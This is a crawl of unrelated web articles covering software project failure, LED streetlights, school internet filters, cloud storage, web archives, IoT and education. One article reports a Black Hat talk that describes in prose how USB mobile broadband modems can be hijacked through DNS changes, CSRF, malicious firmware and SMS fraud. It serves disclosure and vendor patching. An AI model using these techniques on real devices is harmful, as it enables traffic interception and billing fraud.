The 4GL trap is easily avoided by understanding the limitations of each language and only using it if all of the features required by the product fit within the assumed model of the language. This is the most insidious part of this trap. Most 4GLs are marketed as being designed for novice programmers with little training. Microsoft has been particularly aggressive in marketing VB to companies as the way to hire 'cheap' programmers. Unfortunately, these are precisely the people who should not be making the decision about when a particular language is adequate for solving a given problem. Choosing the wrong language will ensure that the product will never ship. Scripting trap. Scripting languages allow the easy creation of sophisticated software by stitching together existing applications. Advanced scripting languages such as Perl are very powerful and can be used for a variety of purposes. Operating systems such as Unix are designed to be easily integrated through scripting languages and have far lower cost of ownership than those whose management tools are grafted on with pretty user interfaces. The trap lies in the sophistication of these languages and the mechanisms that make it easy to write programs. Most scripts are not maintainable, or even readable, by the people who created them. This does not mean that scripts are bad things. They are the perfect solution for integrating existing tools and making small programs. However, since they are always expensive to maintain, the amount of effort put into any single script should be below the threshold of throwaway code: essentially, it is usually cheaper to rewrite the script than to try to modify it. A stark example of the scripting trap comes from Excite. Excite built its original search and Web serving infrastructure in Perl on Unix machines. Perl allowed Excite to quickly create products that competed with more mature companies such as Yahoo and WebCrawler. However, by 1998, maintenance expenses made it impossible to add new features. Excite had to stop all production and rewrite its infrastructure in Java. This transition took many months and hindered Excite's ability to compete in other markets such as online shopping and video streaming. Avoiding the trap is relatively easy. There are many applications that are small and will remain small forever. These are perfect for scripting languages. If new features are required, their small size makes it easy to rewrite them in an OO language to control the cost of change. Integrated Development Environment (IDE) trap. Many companies produce IDEs that allow developers to quickly deploy code that they write. Examples include Microsoft's Visual InterDev and .NET framework, IBM's VisualAge and Oracle's 8i. The problem with these environments is that they make assumptions about the target deployment environment and workgroup configuration. The deeper problem is that companies do not design these tools to help developers, but to lock developers who use their IDEs into their platforms. In the real world of changing requirements, platform restrictions are often deadly. These restrictions include limited OS support, limited APIs that may make certain features impossible, or platform bugs. Often, the only way around these restrictions is to rewrite major amounts of code. The IDE trap is easily avoided by choosing tools that do not lock you into a vendor's technology. In addition, development teams must deploy to production-style systems early in the development process.
This allows adequate time to develop the necessary scripts and procedures to ensure proper delivery. Reengineering trap. Reengineering projects are designed to address the exponential cost of change of an existing system. Lessons learned in previous versions can be applied to control the cost of change. Reengineering almost always fails because the existing code cannot be easily changed; its cost of change is already exponential. If the cost of change were not exponential, there would be no reason to reengineer. This makes it extremely expensive to work with the existing code. As a result, reengineering usually takes as long as or longer to complete than the original product while producing the same set of features. If it took 10 man-years to complete the first product, it will probably take 10 man-years to complete the reengineered version with exactly the same features. Ten man-years for a zero-sum gain. This is why reengineering projects are rarely completed. The reengineering trap is avoided by developing a migration strategy. All new features must be kept separate from the original code base to avoid the exponential cost of change, while the original code base is mined for completed features. Whenever a bug is encountered in the original code base or an existing feature needs to be extended, the existing code is removed and refactored into the new code base. These migrations are expensive, but there is no way to avoid them. In this way, an organized reengineering of only those sections that are not currently adequate will be performed. The cost of changing these sections will be exponential, but will hopefully be limited. In a capitalist economic system, software must possess a positive ROI in order to make sense to an organization. Many software products fail not because there is no market, but because the cost of creating the software far outstrips any profit. Exponential costs of change exacerbate this problem. Software processes are designed to manage these costs; however, it is crucial that an organization understand how and when the costs of creating software will outstrip the worth of a product. Fortunately, software products tend to fail in one of four modes. By understanding these modes, organizations can choose the appropriate software process to avoid these failures. Each software process model (waterfall, iterative, spiral) has a different approach to managing costs. How each process attempts to manage costs is beyond the scope of this article. However, understanding how costs contribute to failures is crucial to picking a model and process appropriate for your organization. Finally, regardless of the chosen software process, there are several traps that can accelerate the exponential cost of software production and must be avoided at all costs. The tools that cause these traps are essential to the existence of any software organization, but inappropriate selection will invariably lead to failure. Fortunately, it is usually possible to avoid these traps. Carmine Mangione has been teaching Agile Methodologies and Extreme Programming (XP) to Fortune 500 companies for the past two years. He has developed materials to show teams how to move from standard methodologies and non-object oriented programming to Extreme Programming and Object Oriented Analysis and Programming. He is currently CTO of X-Spaces, Inc., where he has created an XP team and delivered a peer-to-peer based communications infrastructure.
Mangione is also a professor at Seattle University, where he teaches graduate-level courses in Relational Databases, Object Oriented Design, UI Design, Parallel and Distributed Computing, and Advanced Java Programming. He holds a B.S. in Aerospace Engineering from Cal Poly Institute and earned his M.S. in Computer Science from UC Irvine. Reference: (1) Brooks, F. P., The Mythical Man-Month, Addison-Wesley, 1995.
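Returning to the economics at the heart of the article, a tiny numerical sketch (all figures invented for illustration, not taken from the article) shows how quickly an exponential marginal cost of change overwhelms a fixed per-feature return, which is the dynamic behind all four failure modes:

```python
# Toy model: each feature adds a fixed amount of return, but the marginal
# cost of the n-th feature grows exponentially once communication overhead kicks in.
RETURN_PER_FEATURE = 100.0   # value each shipped feature brings in (invented)
BASE_COST = 20.0             # cost of a feature while the cost curve is still flat (invented)
GROWTH = 1.35                # how fast marginal cost grows per feature (invented)

def marginal_cost(n):
    return BASE_COST * (GROWTH ** n)

cum_cost = cum_return = 0.0
for n in range(1, 21):
    cum_cost += marginal_cost(n)
    cum_return += RETURN_PER_FEATURE
    roi = cum_return - cum_cost
    print(f"feature {n:2d}: cumulative cost {cum_cost:8.1f}  return {cum_return:8.1f}  ROI {roi:8.1f}")
    if marginal_cost(n + 1) > RETURN_PER_FEATURE:
        print("-> the next feature would cost more than it returns; development should stop here")
        break
```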
<urn:uuid:0c1e5c07-0f2d-4eb9-8d6c-d10ca2ab63f7>
CC-MAIN-2017-09
http://www.cioupdate.com/reports/article.php/1563701/Software-Project-Failure-The-Reasons-The-Costs.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170380.12/warc/CC-MAIN-20170219104610-00147-ip-10-171-10-108.ec2.internal.warc.gz
en
0.948061
2,736
3.09375
3
State and local governments looking to improve efficiency and cut costs are casting their gaze skyward -- at streetlights -- for an answer. Some cities are modernizing their streetlights with light-emitting diodes (LEDs), others link them to centralized control systems and some do a combination of both. Replacing the high-pressure sodium (HPS) bulbs commonly used in streetlights with LEDs is a simple solution that can yield big benefits. According to a report from the Rensselaer Polytechnic Institute, Transcending the Replacement Paradigm of Solid-State Lighting, by Jong Kyu Kim and E. Fred Schubert, "Deployed on a large scale, LEDs have the potential to tremendously reduce pollution, save energy, save financial resources, and add new and unprecedented functionalities to photonic devices." Another strategy used by some municipalities is implementing a centralized control system that alerts officials when a light goes out. Previously a city worker or resident had to see a malfunctioning light and report it. A centralized system allows manpower to be used more efficiently and helps track energy consumption. Anchorage, Alaska, is lighting up the northern sky as the city works toward converting all its 16,500 streetlights to LEDs. According to Michael Barber, the city's lighting program manager, Anchorage purchased 4,300 LEDs in August 2008 for $2.2 million. He said energy efficiency and cost savings drove the initiative. So far, 1,200 lights have been installed, and Barber said the remaining 3,100 of them would likely be set up by May 2009. One of LEDs' main benefits -- besides using 50 percent less energy than traditional bulbs -- is that they can be connected to a centralized control system, which Anchorage has done. "Either over the power line or radio frequency, we have a light that's communicating with a server and telling it, 'I'm burning at this temperature,' or, 'For some reason, I'm sucking up way more energy than I should,'" Barber said. The system lets the city know in real time when a light should be replaced or needs warranty support. That's important because LED bulbs are significantly more expensive. In the past, when an HPS streetlight bulb failed within the warranty period, Barber said the city would forgo the warranty and just replace it because those bulbs are cheap -- only $10 each. LEDs, however, cost $500 to $1,000 apiece, so it's important to have accurate information. When an LED loses 30 percent of its initial luminosity, it's considered to have failed. "With control systems we can have the light tell us when there's a warranty issue or if the light goes out," he said. "We'll see a surge and a change in the energy consumption on that circuit." Another benefit of the centralized system is increased efficiency through the use of controls, which leads to more energy and money saved. LEDs have dimmable ballasts that allow officials to change the light's brightness, which is a big advantage over HPS bulbs. Barber said the city is planning to dim the streetlights in residential neighborhoods between 10 p.m. and 5 a.m. by 40 to 50 percent. He hoped that by May 2009, the city's next round of budgets would be completed and there would be funding to continue retrofitting the remaining 12,200 streetlights. "We estimate that when we do the whole city, it will be within $1.5 [million] and $1.7 million a year in savings," Barber said.
"We don't know what that would mean if we also implemented controls over the whole city, but it wouldn't be shocking to see 70 percent efficiency over the [HPS]." Centralized control systems are also benefiting cities that haven't converted to LED streetlights. About five years ago, Los Angeles began testing a remote-monitoring system on 5,000 of its more than 209,000 streetlights, according to Norma Isahakian, assistant director of the city's Bureau of Street Lighting. "I think the main benefit up to this point has been reporting on when the lights are out," Isahakian said. "We want to make sure the majority of lights are on, not just for the fact that we want the lights on, but there are also liability reasons." The city is attaching external computer boxes to its streetlights. Isahakian said the external units work best because Los Angeles uses more than one streetlight manufacturer. There's the cost of an external unit for each light and the base computer unit that information is transmitted to. "They use radio waves to get the information back to the main unit, and the main unit uses a cellular system to get it back to the main office," she explained. She said the project was initially launched in a convenient location where city-employed field workers were close enough to physically see the lights, which they then tracked online. The computer boxes are now installed on new streetlights in construction areas and on those that are replaced. Better workflow has been another improvement. "A lot of times when we go out to the unit, we know what's going wrong with it," Isahakian said. "Instead of making multiple trips, we'll make only one trip because we'll know the unit just needs to be changed." Los Angeles is also beginning to pilot the use of LED streetlights. According to the city's LED Street Lighting Energy Efficiency Program, the first phase involved retrofitting 100 streetlights between November 2008 and January 2009. According to a document from the program, "Based on preliminary analysis and evaluation of the development of the LED industry, the bureau is strongly considering a large-scale project to replace existing roadway fixtures into LED or any other high-efficiency light source." Isahakian said the bureau has been researching LEDs for the last couple of years, but only recently did the lights begin performing up to the standard it was looking for. "I think the remote-monitoring system and the LED fixtures together are really going to make more sense," she said, "because you're able to do more things with them, like dim the streetlights."
<urn:uuid:b8e32b9c-4375-4ff8-97d2-23c47a6cee2d>
CC-MAIN-2017-09
http://www.govtech.com/featured/Light-Emitting-Diode-Streetlight-Systems-Help.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170651.78/warc/CC-MAIN-20170219104610-00323-ip-10-171-10-108.ec2.internal.warc.gz
en
0.964316
1,266
3.0625
3
During this year's State of the Union address, President Obama championed the goal of increasing bandwidth in schools across the country. The following day, a group of CEOs wrote an open letter encouraging the chairman of the FCC to "act boldly to modernize the E-rate program to provide the capital needed to upgrade our K-12 broadband connectivity and Wi-Fi infrastructure." These calls to action were answered with pledges from business leaders amounting to $750 million, an influx of money that should help provide more enriching learning environments for students across the country. As schools begin to plan for the benefits of improved connectivity, it is important to consider the responsibility of giving students guidance in becoming productive citizens of the web. New curricula must acknowledge the many-headed hydra that is social media: Its forms range from the mundane distraction to be overcome to the 21st-century communication skill to be mastered. Integration of conscious social media use as well as policies that provide more free and unfiltered Internet access are two ways of modeling best practices and actively teaching Internet skills within schools. Especially as mobile devices enter the classrooms, students are exposed to the full range of what is available on the Internet. So it should be in the domain of schools more than ever to help students manage these capabilities. In an article called "Driven to distraction: How to help wired students learn to focus," psychologist Larry Rosen finds in his research that students who are constantly distracted by social media do far worse academically than their peers who exercise more impulse control over their use of technology. Even with these findings, Rosen does not insist that technology be kept out of the classroom; in fact, he recommends allowing this part of kids' lives into the classroom through managed "technology breaks." Rosen argues that students must learn how to function alongside distraction and that school is a good forum for students to actively practice this sort of metacognition. In an article on boredom and Twitter in schools, Amanda Ripley suggests that students who are bored fall into two groups: the "reappraisers," or students who teach themselves to see the value in a boring task, and the "evaders," or those who search for distraction from boredom in technology. Unsurprisingly, the former have much more success academically than the latter. It is important that students not be conditioned to think of social media only as an escape to drown out other necessary tasks, but as something that might be integrated thoughtfully into life. This sort of skill is not just important in school. Even on the job, the most valuable employees will be those who know how to balance focused work and social interaction even when both collide on the device in front of them. Even with the new push for universal broadband in schools, though, there's a barrier to teaching children these valuable lessons: widespread use of Internet filters in schools. The federal Children's Internet Protection Act mandates that libraries and schools (especially those receiving internet subsidies through the government's E-rate program) use such filters. Although in many cases adults can disable filters, the process is often complicated and cannot be done easily for a class of students working on an assignment that requires access to blogging platforms or other social media.
In blocking harmful content, commonly used software like Websense and AutoExec Admin limits access to much important social media because of the difficulty of filtering explicit content from user-generated material. Supervision of computer use is far better for educational purposes than simply shutting down rich and useful websites completely. Karen Cator, director of education technology at the United States Department of Education, says about Internet filters in schools, "What we have had is what I consider brute-force technologies that shut down wide swaths of the Internet, like all of YouTube, for example. Or they may shut down anything that has anything to do with social media, or anything that is a game. These broad filters aren't actually very helpful, because we need much more nuanced filtering." The tension between the educational goal of teaching students to use the web well and the reality of Internet filters is evident in a recent document from the New York City Department of Education. This past fall, it released a guide to social media use for students. The outlook is sunny. The obvious message is that social media is an important life skill for the 21st century, applicable to future jobs. The guidelines state their purpose as three-fold: to give "recommendations about healthy social media communications" and "ideas about how to create a smart digital footprint," as well as to advise on what to do in cases of inappropriate behavior and cyber-bullying. But the document steers clear of any promises about what schools will teach; it rests at suggestion. In fact, the section about creating a digital footprint culminates in a reminder that "Families can be helpful partners" and that students should "Share your digital footprint with your parents and consider their suggestions." By passing responsibility on to parents, this document acknowledges that many of the city's classrooms fall victim to just the sort of "brute-force technologies" that Cator speaks against. Before schools can take an active role in teaching social media use, responsibility, and self-discipline, students' and teachers' legitimate access to such platforms in the classroom must be clarified and legitimized by modernizing web filters. The intentions behind using Internet filters in schools are good, of course, but they were created in times when it was still possible to shield students from the dangers of the unknown. Better now is to take the needed steps toward educating students about how to live responsibly and productively on the Internet. As the recent failed rollout of iPads in Los Angeles has shown, students excel at breaking through filters and accessing whatever they want through proxy servers. It is counterintuitive to move forward with new technology in schools while still holding on to older models of the division between what is potentially harmful and what holds educational value.
<urn:uuid:6be2ea4c-8dc8-4608-98a5-12d59e543ade>
CC-MAIN-2017-09
http://www.nextgov.com/emerging-tech/2014/02/schools-should-be-teaching-kids-how-use-internet-well/78854/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172156.69/warc/CC-MAIN-20170219104612-00551-ip-10-171-10-108.ec2.internal.warc.gz
en
0.961908
1,222
2.84375
3
Cloud computing isn't shaped like, or used like, the traditional computing model of the past. Cloud architectures allow users to access virtual pools of IT resources (from compute to network to storage) when they need them and, thus, achieve shared efficiency and agility. Made possible by the advent of sophisticated automation, provisioning, and virtualization technologies, the cloud computing model breaks the ties between the user's application and the need to maintain the physical servers and storage systems on which it runs. Instead, users tap into aggregated resources as they need them. Cloud infrastructure can be provided as a public cloud (IT resources shared by multiple clients) or a private cloud (IT resources, whether external or internal, controlled and managed by the IT organization). In this section, we will explore this dynamic new model of IT as a service and its impact on enterprises and the IT industry. SEEDING THE CLOUD: ENTERPRISES SET THEIR STRATEGIES FOR CLOUD COMPUTING Read what IT executives at leading U.S. companies are saying about cloud computing in a new EMC-sponsored study by Forbes Insights.
<urn:uuid:2d64bf32-9f3b-4bc6-bbc9-0d1dd8ee21e5>
CC-MAIN-2017-09
https://www.emc.com/leadership/articles/cloud-computing.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174135.70/warc/CC-MAIN-20170219104614-00075-ip-10-171-10-108.ec2.internal.warc.gz
en
0.912471
235
2.765625
3
"You own your own words," is one of the oldest online maxims. If only it were that simple. This adage comes from the pre-Internet explosion days, when computer bulletin board systems were how most people communicated online. It was coined by Stewart Brand, co-founder of online community The WELL, in an attempt to make users liable for their postings should libel disputes arise. But it has also been interpreted to mean nobody else but you should copy and reuse your words online unless you give permission to do so - even though Brand himself opposed this copyright interpretation of what he wrote in his early WELL members agreement. Though others also agreed with this broader interpretation, not everyone has. When you launch a Web site, post a blog or participate in Internet discussions, you may think your words will gradually fade away. If after posting online you had second thoughts and took it down, you might assume it's really gone. But chances are, it's all still up there. Internet archive systems exist, that in all likelihood, are preserving these things long-term. The best-known Web archive service is the Wayback Machine, part of a larger effort called the Internet Archive. This free service has taken snapshots of the Web at various points in time since 1996. An astonishing 85 billion pages are currently archived. Archiving is about redundancy, and the Wayback Machine's content is mirrored, appropriately enough, at the New Library of Alexandria in Egypt. The original Library of Alexandria, founded by the Greek rulers of Egypt around 300 B.C., was designed to be the world's knowledge repository. If you don't want your words preserved for posterity, the Wayback Machine lets you opt out. The service has instructions on how to remove previous versions of your site from its archive and also prevent it from making archives in the future. Another well known archive service is Google Groups - a Web interface to Usenet, the worldwide system of hundreds of thousands of online discussion groups. People can participate in discussions via the Web, e-mail program or a specialized Usenet program. Google Groups lets you search for and join specific discussion groups, as well as search for current and old posts about specific subject matter; archives go back to 1981. In the same manner as the Wayback Machine, Google Groups lets you remove previous posts from its archive and prevent it from archiving future posts but you must have a free account - preferably the same one used for the posts you want deleted. You can delete posts made with an old e-mail address you no longer have, but it's more cumbersome. Many other Web sites crawl the Web, Usenet, Yahoo Groups and similar places, and create their own archives, some of which can be found by conducting a keyword search on Google. Some of these sites, however, are pay services, and Google can't access their archives, so there's no way to ensure your words are completely within your control. Perhaps the best strategy, if you don't want your words to come back and haunt you, is to remember your mother's advice: Think before you speak. Another option is to use a pseudonym or "handle." The flip side of Internet archive services is their usefulness in helping you find what might otherwise have been lost.
<urn:uuid:a03ae939-1b72-4847-8cb5-52a13fcd2bba>
CC-MAIN-2017-09
http://www.govtech.com/magazines/gt/Internet-Archive-Services-Preserve-Your-Words.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170404.1/warc/CC-MAIN-20170219104610-00495-ip-10-171-10-108.ec2.internal.warc.gz
en
0.964145
672
2.765625
3
The definitive definition of IoT from the experts for the kids (and adults, too). Eileen O'Mara, VP sales EMEA at salesforce.com "Imagine if a car, a kettle and your toothbrush could all speak to you. The car could let you know that its tires need air, the kettle that the boiled water is cooling and you should hurry up and make that cup of tea before it gets too cold, and your toothbrush lets you know when you've brushed your teeth for two minutes as it's best to keep your teeth healthy. "In the Internet of Things, the car, the kettle, your toothbrush and many other things become smart and get a voice. This means they can communicate with you even when you're not around, and you can control them remotely – all through an app on your phone." Richard Holway, chairman of TechMarketView (tested on my five-year-old godson, Harry) "Imagine if your cat went missing and you could find out exactly where it was. Imagine if your fridge could order your favourite juice from the supermarket rather than Mummy forgetting. Imagine if Daddy could warm up the car before you got in to go to school. Imagine if, when Grandma was ill, the doctor could be called immediately. Imagine if your toys could speak to one another. Imagine the 'Internet of Things'. Reality sooner than you think!" Andrew Roughan, product and marketing director at Infinity SDC "Talking to another person is usually interesting; we use facial expressions and gestures which help us convey our point so other people know what we want and how we feel. "People are good at this because we have been doing it for a long time, but we're not very good at talking to inanimate objects, like toys, computers, or listening to machines that give us choices. "We're really slow at doing this because things don't speak the same language as us. However, we have made computers and appliances become really smart, and clever people have made them talk to each other in a different language. These clever people have let the things that matter to us, like our home and computers in shops, talk to each other, without us people getting in the way. "We have put together a network called the 'Internet of Things', which connects all of the 'things' together so they can communicate. For example, imagine never having to wait for the oven to heat up to cook dinner, as Mummy and Daddy could turn it on using their mobile phone in the park." Professor Amir Sharif, Acting Head of Brunel Business School "The "Internet of Things" (IoT for short) is an exciting and developing idea that suggests you will no longer need to have a computer to access or be connected to the Internet. "Science fiction is rapidly turning into fact. It is no longer a vision of the future. You can now really talk into your watch (or at least communicate through it) and use it as a phone. The future is happening as we speak, and many companies are creating this for us. So things that aren't computers are already connected to the internet. "Do you like running? Chances are your run is fuelled not only by music through your smartphone/MP3 player, but is also monitored for your heart rate, number of steps taken and calories burned. A combination of Apple i-devices (iPods and iPhones of all varieties) and Nike's Fuel Band are existing IoT devices already. "Do you wear a watch? Well, of course, now you can have a smartwatch which links with your phone so you can speak into your wrist to your friends. We have Samsung and their Samsung Gear gadgets to thank for that. "Do you wear glasses?
I think you can guess where this is going – yes, we now have the very cool Google Glass technology which overlays what you see through your eyes on the surface of the spectacles you wear, with internet-sourced information displayed in real time (which is known as 'Augmented Reality', adding digital information to what you're seeing of actual things around you). "Do you have a home and want to heat it? Imagine having the ability to not only control your own electricity consumption remotely, but to allow your own house to manage your energy usage and consumption. Technologies such as Nest provide this and many more "smart home" technologies including remote lighting. "Wonderful gadgets, most of which are now beginning to display real utility and benefit to our daily lives. But the exciting part about IoT is not just where these connected 'things' are now and what they can do for us at present, but where this will take us. "Scientists, technologists and businesses are rapidly considering a time when even wearable computers will become a thing of the past. Companies such as Intel have proposed that the internet of things needs to be completely invisible – you shouldn't have to even see or recognise an object as being connected to the internet. It will just naturally be connected and "on" all the time. "So my advice is: enjoy your smart and Internet-connected devices while you can still see them. Eventually they might even be embedded within us – and we might become a 'thing' within the Internet as well."
<urn:uuid:7f9a1363-7129-4114-bdd5-e0bae1646f78>
CC-MAIN-2017-09
http://www.cbronline.com/news/enterprise-it/15-ways-to-explain-the-internet-of-things-iot-to-a-five-year-old-4315594
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171629.92/warc/CC-MAIN-20170219104611-00547-ip-10-171-10-108.ec2.internal.warc.gz
en
0.971825
1,125
3.046875
3
Once seen as the bane of classroom attention spans, Internet of Things connected devices are now becoming standard operational and teaching tools in schools, where they enhance how students interact with information, make it easier for schools to monitor and address student safety, and reduce many stresses for students, teachers, and parents. Education in the Cloud The cloud's ability to store, organize, and search information is saving teachers time and saving schools money. Teachers can now make class work and lessons available to students on the cloud, so they no longer need to print material for every student in a given class, which also saves the school money on ink and paper. Multiple-choice quizzes can be administered online and graded automatically, giving teachers more time to plan their classes instead of tediously hand-grading tests and quizzes. The cloud also teaches students to collaborate more effectively while acclimating them to digital tools that are widely used in the real world. For example, the collaborative editing features in Google's G Suite programs such as Docs and Slides make it simple for students to collaborate on documents and presentations in real time. And what if a student forgot their homework assignment? Teachers can place assignments in a Google Drive or other online storage folder for access from any cloud-connected device, so forgetting course materials will no longer be a concern. Notes, resource materials, and assignments stored in the cloud are easily searchable, which teaches students valuable organization skills while ensuring they don't miss an assignment. Using IoT for Roll Call With admission rates for schools continuously on the rise, monitoring attendance and safety has become a challenge for school districts. Attendance benchmarks need to be reached to ensure state funding requirements are met. Sometimes students aren't in the class where attendance is being taken; they could be in the nurse's office or detention. School ID badges embedded with RFID chips and specialized sensors placed throughout campus let schools automatically account for all students on campus and see exactly where they are. This has raised privacy concerns among parents, but RFID accountability has the potential to save student lives in case of an emergency. For example, if there's a fire, faculty can receive text alerts to quickly see if students are still in the building after the evacuation process. GPS Tracking for School Buses Getting ready in the morning is often the most Herculean task accomplished in the day: making breakfast, packing lunch, getting the kids ready, and sending them out to catch the bus is enough stress for any parent without wondering if the bus will be on time on a given day. Wouldn't it be a relief to know exactly when the bus was coming to ensure your child isn't in the street any longer than necessary? Wouldn't it also be nice to know your child arrived home safely if you can't be there to pick them up? Schools are now using the same GPS technology used to monitor commercial shipping fleets to monitor buses. Families with multiple children can receive alerts to let them know which child needs to head out at what time, eliminating the stress caused by juggling multiple bus schedules. The Austin Statesman reported that all school buses in the Austin Independent School District can now be tracked from a smartphone app.
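The roll-call idea described above amounts to joining badge reads from campus sensors against the enrollment list. Here is a minimal sketch of that matching step (badge IDs, names, locations and data shapes are all invented for illustration):

```python
from datetime import datetime

enrolled = {"badge-1001": "Ada", "badge-1002": "Grace", "badge-1003": "Alan"}

# Each sensor read: (badge_id, location, timestamp)
reads = [
    ("badge-1001", "Room 204", datetime(2017, 2, 19, 9, 2)),
    ("badge-1003", "Nurse's office", datetime(2017, 2, 19, 9, 5)),
]

def roll_call(enrolled, reads):
    """Return where each enrolled student was last seen, and who is unaccounted for."""
    last_seen = {}
    for badge, location, ts in reads:
        if badge in enrolled:
            prev = last_seen.get(badge)
            if prev is None or ts > prev[1]:
                last_seen[badge] = (location, ts)
    missing = [name for badge, name in enrolled.items() if badge not in last_seen]
    return last_seen, missing

seen, missing = roll_call(enrolled, reads)
for badge, (loc, ts) in seen.items():
    print(f"{enrolled[badge]}: {loc} at {ts:%H:%M}")
print("Unaccounted for:", ", ".join(missing))
```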
As more educational institutions tap into the power of Internet of Things technology, teachers and students will undoubtedly become more connected through IoT. If you’re developing education-related IoT apps or devices, Aeris connectivity is available to get you up and running to help schools move into the future. Find out about the many options for IoT technology, connectivity, and devices in our whitepaper.
<urn:uuid:758ce80b-e7bf-4984-8300-b3c18166f55f>
CC-MAIN-2017-09
http://blog.aeris.com/how-iot-enhances-education
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170993.54/warc/CC-MAIN-20170219104610-00543-ip-10-171-10-108.ec2.internal.warc.gz
en
0.947498
734
2.875
3
Let's say you have your laptop and you need to get online, but you don't trust a public wireless network such as at Starbucks or McDonalds and you don't otherwise have access to an Ethernet cable; for some people, to the tune of about 100 million devices, the answer to this dilemma is to use a mobile broadband modem in the form of a USB dongle to access the Internet via a cellular network. But in the Black Hat USA presentation, "Attacking mobile broadband modems like a criminal would," Andreas Lindh explained how easily attackers can remotely exploit multiple security vulnerabilities in many of those devices. Most mobile broadband modems, sometimes referred to as connect cards or data cards, are made by Huawei and ZTE. Those manufacturers sell many of the devices to wireless carriers who then resell the modems to their customers. The modems usually run embedded Linux and work in a manner similar to Wi-Fi routers; but unlike regular routers, these modems are meant to be plugged into a USB port and be used by a single user. The modem has an embedded web server that is used to configure the device. Since the administration web page cannot be accessed wirelessly, not much attention has been focused on securing this server. In fact, there isn't even a password to protect the admin page. Although there has been research into vulnerabilities and how to exploit these devices in the past, the attacks were so complex that they required substantial skills and effort to pull off. Lindh, who works for ISecure Sweden, said there are much easier ways to profit from attacking the modems. "Criminals like the easiest way. Their objective is to get paid. This is the path of least resistance. They're going to take the path of least resistance," Lindh said before adding, "And these attacks have great potential for paying off." One of those attacks would allow an attacker to change the settings on the modem. Although the user may not be able to see the pre-installed profile for how the device will connect, Lindh said an attacker could still change those settings. "I'm actually able to modify the network settings of the modem," Lindh told Tech Page One. "Just by having users go into a webpage, I can alter the DNS settings. If I can do that, I can point them to my own DNS and then control where they go on the Internet." An attacker could use a DNS poisoning attack to direct a user toward a site that appeared to be Facebook, but wasn't, in order to grab the victim's credentials. Lindh said, "Or, if I want to make it really easy for myself, I can just get paid for sending people to ads." An attacker could create a persistent backdoor in several ways. One is by "spoofing the server that the modems use to download firmware updates" and installing malicious firmware. "Exploiting cross-site scripting (XSS) vulnerabilities in the modems' administrative interfaces" would allow malicious code to be stored in the modem's configuration to provide an attacker with continued access. Another way an attacker could set up a stealthy backdoor into the victim's modem is by exploiting SMS functionality to implant malicious code. Lindh believes that criminals will most likely attack the SMS functionality in the modem. He said, "These devices are basically just cell phones that you can't make a call with. SMS definitely will be abused. There's a million ways to do this." Attackers could exploit SMS functionality to steal personal data or to send SMS to a premium-rate number controlled by the attacker.
Several years ago, F-Secure's Mikko Hypponen explained this type of premium-rate SMS fraud in a Black Hat presentation titled, "You will be billed $90,000 for this call." Lindh advised people not to underestimate these risks because, bottom line, a criminal wants to get paid and will take the easiest path to that payday. "The update model is utterly broken for these modems," he said. "The vendors have to do one patch for each carrier, then the carrier has to decide whether to send it to their users and the users have to decide whether to install it. Most of these devices will never be patched." On the same day as Lindh's Black Hat presentation, Huawei released a security advisory and updated software fixes for the Huawei HiLink E3236 and E3276 because the devices are vulnerable to cross-site request forgery (CSRF) attacks. Attackers can create a website that contains malicious scripts and lure E3236 and E3276 users to it. Once users visit the website and the malicious scripts execute, the scripts can send illegitimate requests from the users' computers to change the configuration or invoke the functions of the E3236 and E3276. After crediting Lindh for finding the vulnerability, Huawei said it "is not aware of any malicious use of the vulnerability described in this advisory." There is no temporary fix, so customers are advised to contact Huawei to request the upgraded software that contains the fix.
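To make the settings attack concrete, here is a minimal, hypothetical proof-of-concept of the kind of unauthenticated configuration change Lindh describes: a script that simply posts a new DNS server to the modem's embedded admin interface. The gateway address, endpoint path and parameter name are invented for illustration and do not correspond to any specific Huawei or ZTE model; a CSRF variant would have the victim's own browser send the same request.

# Hypothetical sketch only: change the DNS server on a USB modem whose embedded
# admin page requires no authentication. IP, endpoint path and parameter name
# are invented and do not correspond to any specific device.
import requests

MODEM = "http://192.168.1.1"      # typical gateway address for such a modem
ROGUE_DNS = "203.0.113.53"        # attacker-controlled resolver (TEST-NET-3 range)

def change_dns(primary_dns: str) -> bool:
    """POST a new primary DNS server to the modem's (unauthenticated) config endpoint."""
    resp = requests.post(
        f"{MODEM}/api/dhcp/settings",      # hypothetical endpoint
        data={"PrimaryDns": primary_dns},  # hypothetical parameter name
        timeout=5,
    )
    return resp.ok

if __name__ == "__main__":
    if change_dns(ROGUE_DNS):
        print("DNS setting accepted; every lookup now flows through the rogue resolver.")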
<urn:uuid:1dc06524-b5d3-4e59-9dbe-b9c3bd9484dd>
CC-MAIN-2017-09
http://www.computerworld.com/article/2476550/cybercrime-hacking/black-hat-talk-exposes-how-easily-criminals-can-hack-mobile-broadband-modems.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170993.54/warc/CC-MAIN-20170219104610-00543-ip-10-171-10-108.ec2.internal.warc.gz
en
0.939988
1,102
2.78125
3
Unified Storage for the Cloud Means Higher-Level Interfaces
In common use, the term "unified storage" means providing block-level and file-level access to the same storage system with a single management and control interface. Traditionally, block-level access is via Fibre Channel or iSCSI, and file-level access is via the NFS or CIFS protocol. Recently, storage vendors have also been adding object-level storage, where the objects are entities with metadata such as type and access control policies. Objects are read and written by applications using REST HTTP or SOAP and used directly at the application level. The most popular API is Amazon's S3 (Simple Storage Service). With the higher abstraction level of objects, the underlying implementation (e.g., number of parts, tiered storage, etc.) is hidden even more than with block- and file-level interfaces. EMC, Hitachi Data Systems, and NetApp, among others, provide unified storage systems. Cloud storage is bringing some different requirements for a unified storage system. Most notably, not only is the data in the cloud, but the applications and compute resources are in the cloud. Instead of pulling data from the cloud, processing the data, and pushing it back to the cloud, the paradigm is to have compute resources in the cloud read and write data directly, local to the cloud. The data is never moved out of the cloud unless absolutely needed. This type of usage pushes the need for even higher-level interfaces to data, such as SQL, Map-Reduce, and ETL. Unified storage for the cloud needs to do more than provide multi-protocol access to data that can be managed with one system. In addition to access, there must be the ability to process the data, e.g., running an SQL query. Then applications can easily use the functionality of the cloud storage/compute system instead of treating the cloud as a dumb storage system and pulling and pushing the data between the cloud storage system and compute resources. Unified storage at the block and file level is still required and important because of 